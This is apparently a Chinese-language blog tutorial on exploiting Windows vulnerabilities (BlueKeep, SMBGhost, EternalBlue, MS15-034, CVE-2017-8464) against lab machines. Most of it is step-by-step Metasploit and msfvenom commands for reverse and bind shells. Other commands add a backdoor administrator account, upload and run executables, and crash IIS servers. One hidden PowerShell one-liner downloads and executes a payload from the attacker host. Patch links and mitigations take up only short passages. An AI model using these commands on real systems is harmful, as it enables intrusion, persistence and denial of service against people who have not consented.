window漏洞命名規則:
CVE→國際漏洞庫編號
格式:CVE-年份-編號
MS→微軟漏洞庫編號
格式:MS年-編號
windows常見漏洞:
這里不全,僅僅例出自己測試過的一些漏洞。了解漏洞的目的是為了防止我們的服務自身存在漏洞被不法分子利用,而非為了成為不法分子!小惡魔門請繞道而行.....
ms08-067、ms12-020(3389)、ms15-034(針對iis中間件)、心臟滴血(還就是針對https443的...)、ms17-010(smb445)、震網三代(美國攻擊伊朗核電站,可還記得)、CVE-2019-0708(3389)、CVE-2020-0796(445)
漏洞檢測:
天境,激光,nessus系統漏洞掃描器
利用POC檢測:
https://github.com/ollypwn/SMBGhost
CVE-2019-0708與MS12-020(遠程3389)
受影響Windows系統版本:
Windows7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
靶機設置:
受害主機開啟了3389遠程連接端口
沒有打對應補丁
msf攻擊准備:
msf5 > search CVE-2019-0708 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free Interact with a module by name or index, for example use 1 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf5 >use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 主要設置RHOSTS RPORT TARGET
ps:
set RHOSTS 受害機IP設置受害機IP
set RPORT 受害機PORT設置受害機RDP端口號
info查看工具具體說明,根據靶機系統選擇targetset。
target ID數字(可選為0-4)設置受害機機器架構
使用的是VMware,那么 target 2 滿足條件
開始攻擊
滲透后處理
建立連接以后,使用shell獲得shell
修復方法
微軟已經於2019年05月4日發布了漏洞補丁,請進行相關升級:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下鏈接下載補丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708
臨時解決方案
1、如暫時無法更新補丁,可以通過在系統上啟用網絡及身份認證(NLA)以暫時規避該漏洞影響。
2、在網絡外圍防火牆阻斷TCP端口3389的連接,或對相關服務器做訪問來源過濾,只允許可信IP連接。
3、禁用遠程桌面服務。
CVE-2020-0796(網絡服務器445端口攻擊)
windows系統445端口默認打開
永恆之藍 2.0 來了,基於 SMBv3 的漏洞,Windows 8和Windows Server 2012 - Windows 10 最新版全部中招,屬於系統級漏洞利用這一漏洞會使系統遭受‘蠕蟲型’攻擊,這意味着很容易從一個受害者感染另一個受害者,一開機就感染。提權后可以做任意操作,例如加密你的文件勒索你。比如說像 EternalBlue 1.0 (永恆之藍 1.0) 一樣,加密文件,對你進行勒索虛擬貨幣!
在微軟發布修補CVE-2020-0796漏洞的安全更新之前,Cisco Talos分享了通過禁用SMBv3壓縮和攔截計算機的445端口來防御利用該漏洞發起的攻擊。
環境准備:
目標機:windows10 1903 x64 ip:192.168.17.72 (關閉防火牆)
windows10 1903 x64迅雷下載:https://sl-m-ssl.xunlei.com/h5/page/download-share/index.html?entry=link&appType=PC&videobtindex=-1&storid=c39vhtrekug5&share_from=dlpage_share_link
攻擊機:kali
漏洞檢測:
利用POC檢測:
檢測工具:https://github.com/ollypwn/SMBGhost
漏洞攻擊:
結果:win藍屏
POC下載:https://github.com/eerykitty/CVE-2020-0796-PoC
/mnt/CVE-2020-0796-PoC-master# python3 CVE-2020-0796.py 192.168.60.52
漏洞利用-getshell
腳本下載:https://github.com/chompie1337/SMBGhost_RCE_PoC
1、 msfvenom生成正向連接木馬(反向木馬反而不好使)
有關msfvenom詳細使用可參考https://www.jianshu.com/p/dee2b171a0a0
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
用生成的shellcode將exploit.py中的這一部分替換掉(buf后的字符串,保留USER_PAYLOAD不變)
2、開啟msf監聽
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 8888 //監聽端口 set rhost 192.168.142.129 //目標主機 run
3、運行exploit.py腳本,反彈shell
4、漏洞利用-本地提權
下載地址:https://github.com/danigargu/CVE-2020-0796/releases
如果提示找不到dll文件,那么
在win10上安裝個vc運行庫就好了
MS17-010(網絡服務器攻擊滲透測試)
用到的靶機為:Win7,端口依然是445
我們進入msfconsole下。
一、在kali中輸入 msfconsole(等待一會可能會有點慢) 二、進入后輸人search ms17-010(就是之前的永恆之藍,也就是新聞上報道的比特幣勒索病毒) 三、找到exploit windows/smb/ms17_010_eternalblue, 運行use exploitwindows/smb/ms17_010_eternalblue ps:由於我用的是虛擬電腦所以我環境已經配置好了。 如果你不知道哪台電腦有漏洞你可以輸入set LHOSTS 192.168.17.0/24 如果是[+]前面是這樣說明有漏洞,然后再set RHOST +IP。 五、設置TCP連接 set payload windows/x64/meterpreter/reverse_tcp 六、run或exploit進行攻擊 七、輸入shell進入對方機器增加用戶 以創建用戶 net user test 1234 /add(xxxx用戶名 1234密碼) net localgroup administrators test /add (將用戶設置為管理員權限) 上傳文件執行 upload /root/123.exe C: execut -f c:\\123.exe
MS15-034(CVE-2015-1635-HTTP.SYS遠程執行代碼漏洞)
漏洞描述
在2015年4月安全補丁日,微軟發布的眾多安全更新中,修復了HTTP.sys中一處允許遠程執行代碼漏洞,編號為:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻擊者只需要發送惡意的http請求數據包,就可能遠程讀取IIS服務器的內存數據,或使服務器系統藍屏崩潰。根據公告顯示,該漏洞對服務器系統造成了不小的影響,主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內的主流服務器操作系統。
漏洞利用
(1)利用ms15-034漏洞讀取服務器內存數據
借助metasploit平台,截圖如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 192.168.17.72 run
(2)利用ms15-034漏洞進行ddos攻擊
同樣借助metasploit平台,截圖如下:
use auxiliary/dos/http/ms15_034_ulonglongadd set rhosts 192.168.80.130 set threads 10 run
攻擊開始后,win7瞬間藍屏然后自動重啟
漏洞修復
禁用IIS內核緩存(可能降低IIS性能)
CVE-2017-8464震網三代(遠程快捷方式漏洞)
漏洞詳情
北京時間2017年6月13日凌晨,微軟官方發布6月安全補丁程序,“震網三代” LNK文件遠程代碼執行漏洞(CVE-2017-8464)和Windows搜索遠程命令執行漏洞(CVE-2017-8543).
CVE-2017-8543,當Windows搜索處理內存中的對象時,存在遠程執行代碼漏洞。成功利用此漏洞的攻擊者可以控制受影響的系統。
CVE-2017-8464,當Windows系統在解析快捷方式時,存在遠程執行任意代碼的高危漏洞,黑客可以通過U盤、網絡共享等途徑觸發漏洞,完全控制用戶系統,安全風險高危。
個人認為,該漏洞不太好用
攻擊准備
攻擊機:kali
IP地址為:192.168.10.118
靶機:win7
IP地址:192.168.10.119
受影響的版本
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
實戰操作如下:
msfconsole search 2017_8464 use exploit/windows/fileformat/cve_2017_8464_lnk_rce set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.10.118(你的IP) exploit
之后會在/root/.msf4/local目錄下生成我們的利用文件
注意:kali2.0下無法直接訪問該文件夾,可通過命令行將/root/.msf4/local/下的所有文件復制到/root/1下
cp -r /root/.msf4/local/ /root/1
全部復制到移動磁盤里面(u盤拷貝),然后在msf中監聽:
search multi/handler use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.10.118 (你的IP地址) run
payload2:利用Powershell快捷鍵
生成攻擊文件:search.ps1,終端輸入
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.100 -f psh-reflection>/opt/search.ps1
然后將/opt/目錄下的search.ps1文件移動到/var/www/html/下
隨后打開Apache服務
service apache2 start
訪問web下的sp1文件
然后在目標機上建立一個快捷方式
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.118/search.ps1');test.ps1"
這里寫我們構造好的代碼
然后選中powershell.exe
再到本機上配置監聽
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.10.118 run
防御措施:
①增強安全意識,不貪小便宜,購物請上正規平台。
②等保不但要做,還要嚴格維持,一切工作已安全生產為中心。
還有其他一些漏洞
......
測試方法大同小異